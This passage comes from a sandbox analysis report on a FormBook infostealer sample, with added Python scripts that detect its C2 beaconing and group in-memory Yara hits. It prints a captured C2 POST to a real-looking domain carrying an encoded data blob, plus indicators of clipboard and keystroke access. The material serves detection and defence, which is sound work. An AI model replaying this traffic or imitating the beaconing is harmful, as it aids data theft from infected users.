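    # Constructed from the report's POST entry (Content-Length and Accept-* headers omitted)
    (b"POST /henz/ HTTP/1.1\r\nHost: www.lyonfinancialusa.com\r\nConnection: close\r\n"
     b"Cache-Control: no-cache\r\nOrigin: http://www.lyonfinancialusa.com\r\n"
     b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
     b"Referer: http://www.lyonfinancialusa.com/henz/\r\n\r\n"
     b"ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD"
     b"(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw)."
     + b"\x00" * 8),
]


@dataclass
class Request:
    method: str
    path: str
    params: dict      # query string (GET) or form body (POST); values left URL-encoded
    headers: dict     # header names lower-cased
    body: bytes


def _kv(text):
    out = {}
    for pair in text.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            out[name] = value
    return out


def parse_request(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = _kv(query) if method == "GET" else _kv(body.rstrip(b"\x00").decode("latin-1"))
    return Request(method, path, params, headers, body)


# A long run of base64-like characters; 64 is my threshold, not a FormBook constant.
BLOB = re.compile(r"^[A-Za-z0-9+/=_~().\-]{64,}$")


def blob_param(req):
    """Name of the first parameter whose value is an opaque blob, or None."""
    for name, value in req.params.items():
        if BLOB.match(value):
            return name
    return None


def indicators(req):
    hits = []
    host = req.headers.get("host", "")
    if req.headers.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if blob_param(req):
        hits.append("opaque_blob_param")
    if req.method == "GET":
        if "user-agent" not in req.headers:
            hits.append("get_without_user_agent")
        if req.body and not req.body.strip(b"\x00"):
            hits.append("nul_only_get_body")         # a GET whose body is NUL bytes only
        if len(req.params) == 2 and any(len(v) <= 4 for v in req.params.values()):
            hits.append("blob_plus_short_tag")        # the <blob>&8p08qr=2d0X shape
    elif req.method == "POST":
        if req.body.endswith(b"\x00"):
            hits.append("nul_padded_post_body")
        if req.headers.get("referer") == f"http://{host}{req.path}":
            hits.append("self_referencing_referer")  # Referer forged from the target itself
    return hits


def host_rotation(reqs, min_hosts=3):
    """Hosts that received the same path and blob parameter name: the bot reuses one
    URI while walking a list of domains, so the path clusters where the hosts do not."""
    seen = defaultdict(set)
    for r in reqs:
        name = blob_param(r)
        if name:
            seen[(r.path, name)].add(r.headers.get("host", ""))
    return {f"{p}?{n}": sorted(h) for (p, n), h in seen.items() if len(h) >= min_hosts}


def analyze(raw_requests):
    reqs = [parse_request(r) for r in raw_requests]
    return [(r.method, r.headers.get("host"), indicators(r)) for r in reqs], host_rotation(reqs)


if __name__ == "__main__":
    per_request, rotation = analyze(REQUESTS)
    for method, host, hits in per_request:
        print(f"{method:4} {host:26} {', '.join(hits)}")
    print("one URI reused across hosts:", rotation)
```

The per-request indicators are individually weak (Connection: close and a missing User-Agent are common), so the cross-request check is the one to alert on: a single path and parameter name hitting four unrelated domains within seconds is the decoy-domain walk the DNS and HTTP entries above show. The POST uses the same parameter name as the GETs, which is why it falls into the same cluster.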
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B1ACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B1B830 GetKeyboardState,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: qHpeBvr9cR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
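The memory-type Yara hits in the "E-Banking Fraud" list and the rule matches above name eight dumps by their Joe Sandbox identifiers. The script below is an added example, not part of the report: it parses those identifiers and groups the hits by the process the report names for each process index (0_2_ = qHpeBvr9cR.exe, 1_2_/2_2_ = febcldoukq.exe, "explorer.exe, 00000003..." and "netsh.exe, 00000005..." in the string entries above). Assumptions of mine: only the first, fourth and fifth dot-separated fields are interpreted (process index, region base address, and a page-protection value that takes the Windows PAGE_* constants 0x40 and 0x04); the other fields are kept verbatim and not decoded, and index 4 is left unnamed because the report does not name it.

```python
"""Group the in-memory Yara hits of this report by process and page protection."""
from collections import defaultdict

PAGE_READWRITE = 0x04           # Windows memory protection constants
PAGE_EXECUTE_READWRITE = 0x40
DEFAULT_IMAGE_BASE = 0x400000   # typical 32-bit image base; the 2.2.febcldoukq.exe.400000 unpack

# Process index -> image name, taken from this report's own entries.
PROCESS_NAMES = {0: "qHpeBvr9cR.exe", 1: "febcldoukq.exe", 2: "febcldoukq.exe",
                 3: "explorer.exe", 5: "netsh.exe"}

# The MEMORY-type Yara matches copied from the report.
YARA_HITS = [
    "00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp",
    "00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp",
    "00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp",
    "00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp",
    "00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp",
    "00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp",
    "00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp",
    "00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp",
]


def parse_sdmp(name):
    """Split a dump identifier. Interpretation (my assumption): field 1 is the process
    index, field 4 the region base address, field 5 the page protection. The remaining
    fields are returned as-is and not decoded."""
    if name.endswith(".sdmp"):
        name = name[:-len(".sdmp")]
    fields = name.split(".")
    return {
        "process_index": int(fields[0]),
        "base": int(fields[3], 16),
        "protect": int(fields[4], 16),
        "other_fields": fields[1:3] + fields[5:],
    }


def summarize(hits):
    """Per process: number of hit dumps, distinct RWX regions, and whether a hit sits at
    the default image base (an unpacked payload mapped where a PE would normally load)."""
    per_proc = defaultdict(list)
    for h in hits:
        d = parse_sdmp(h)
        per_proc[d["process_index"]].append(d)
    out = {}
    for idx, dumps in sorted(per_proc.items()):
        rwx = sorted({d["base"] for d in dumps if d["protect"] == PAGE_EXECUTE_READWRITE})
        out[f"{idx}:{PROCESS_NAMES.get(idx, 'unnamed')}"] = {
            "dumps": len(dumps),
            "rwx_regions": [f"0x{b:08X}" for b in rwx],
            "image_base_hit": any(d["base"] == DEFAULT_IMAGE_BASE for d in dumps),
        }
    return out


if __name__ == "__main__":
    for proc, info in summarize(YARA_HITS).items():
        print(proc, info)
```

Read together with the report, the output says where the payload lives: in the second febcldoukq.exe instance it is at 0x400000 with execute/read/write protection (the region the "2.2.febcldoukq.exe.400000.0.unpack" match was carved from), and in netsh.exe and explorer.exe it is in RWX regions at non-image addresses, which is what a memory scanner should be prioritising when the same family is suspected on a live host.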
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00406333
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B2A9AA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B134E0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B1C4C0
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B18E70
